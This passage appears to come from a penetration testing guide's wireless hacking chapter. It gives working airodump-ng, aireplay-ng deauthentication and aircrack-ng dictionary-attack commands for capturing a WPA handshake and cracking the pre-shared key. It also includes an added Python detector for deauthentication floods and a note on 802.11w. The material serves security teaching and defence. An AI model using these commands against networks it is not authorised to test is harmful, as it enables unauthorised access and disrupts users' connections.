Capturing Packets
Step 3—Next, we need to save the data associated with our access point to a specific file. The inputs we need to specify are the channel, the BSSID, and the file name to write.
Command:
airodump-ng -c 1 -w rhawap --bssid F4:3E:61:92:68:D7 mon0
◾ -w: File to write
◾ -c: Channel
Capturing the Four-Way Handshake
Step 4—In order to successfully crack WPA, we need to capture the four-way handshake. As mentioned, to achieve this we could use a deauthentication attack to force clients to disconnect and reconnect with the access point.
Structure:
aireplay-ng --deauth 10 -a <Target AP> -c <Mac address of Mon0> mon0
Command:
aireplay-ng --deauth 10 -a F4:3E:61:92:68:D7 -c 94:39:E5:EA:85:31 mon0
After we have successfully performed a deauthentication attack, we will be able to capture the
four-way handshake.
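From the defender's side, the burst of deauthentication frames this step relies on is visible to any monitoring sensor. The following added example (not from the book) parses raw 802.11 frames and flags a BSSID/station pair that sees an unusual number of deauthentication frames in a short window; the window, threshold, helper names and sample capture are assumptions constructed for illustration.

```python
import struct
from collections import defaultdict, deque

WINDOW_SECONDS = 5.0  # assumed sliding window
THRESHOLD = 8         # assumed deauth frames per window before alerting

def mac(raw):
    return ":".join(f"{b:02X}" for b in raw)

def parse_deauth(frame):
    """Return (dest, src, bssid, reason) for a radiotap-stripped deauth frame, else None."""
    if len(frame) < 26:
        return None
    fc = frame[0]
    # Frame control byte 0: version (2 bits), type (2 bits), subtype (4 bits).
    if fc & 0x3 != 0 or (fc >> 2) & 0x3 != 0 or fc >> 4 != 12:
        return None  # not a management frame of subtype deauthentication
    (reason,) = struct.unpack_from("<H", frame, 24)
    return mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22]), reason

def detect_floods(timed_frames, window=WINDOW_SECONDS, threshold=THRESHOLD):
    """Return one (time, bssid, station) alert per pair that exceeds the rate."""
    recent, alerted, alerts = defaultdict(deque), set(), []
    for ts, frame in timed_frames:
        parsed = parse_deauth(frame)
        if parsed is None:
            continue
        dest, src, bssid, _reason = parsed
        station = dest if src == bssid else src  # the non-AP end of the frame
        times = recent[(bssid, station)]
        times.append(ts)
        while ts - times[0] > window:
            times.popleft()
        if len(times) >= threshold and (bssid, station) not in alerted:
            alerted.add((bssid, station))
            alerts.append((ts, bssid, station))
    return alerts

def build_deauth(dest, src, bssid, reason):
    """Construct a 26-byte deauth frame for the sample data below."""
    raw = lambda m: bytes.fromhex(m.replace(":", ""))
    return b"\xc0\x00\x00\x00" + raw(dest) + raw(src) + raw(bssid) + struct.pack("<HH", 0, reason)

AP, STA = "F4:3E:61:92:68:D7", "94:39:E5:EA:85:31"  # MACs from the page
OTHER = "02:00:00:00:00:01"                          # constructed station
# Constructed capture: one ordinary client departure, then a burst of ten.
SAMPLE = [(0.0, build_deauth(AP, OTHER, AP, 3))]
SAMPLE += [(60.0 + 0.1 * i, build_deauth(STA, AP, AP, 7)) for i in range(10)]
print(detect_floods(SAMPLE))
```

Enabling 802.11w Protected Management Frames on the access point and its clients causes spoofed deauthentication frames to be ignored.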
Ethical Hacking and Penetration Testing Guide
Cracking WPA/WPA2
Now that we have all the inputs required for cracking the WPA/WPA2 PSK, we will use aircrack-ng and specify a wordlist to be used against the rhawap.cap file that was generated earlier. Remember that in order for us to successfully crack the WPA/WPA2 PSK, we need to make sure that our file contains the four-way handshake.
Structure:
aircrack-ng -w Wordlist 'capture_file'.cap
Command:
aircrack-ng rhawap.cap -w /pentest/passwords/wordlists/darkc0de.lst
So, now this will start the dictionary attack against the rhawap.cap file, and if the key is found
in the dictionary, it will reveal it to us.
Wireless Hacking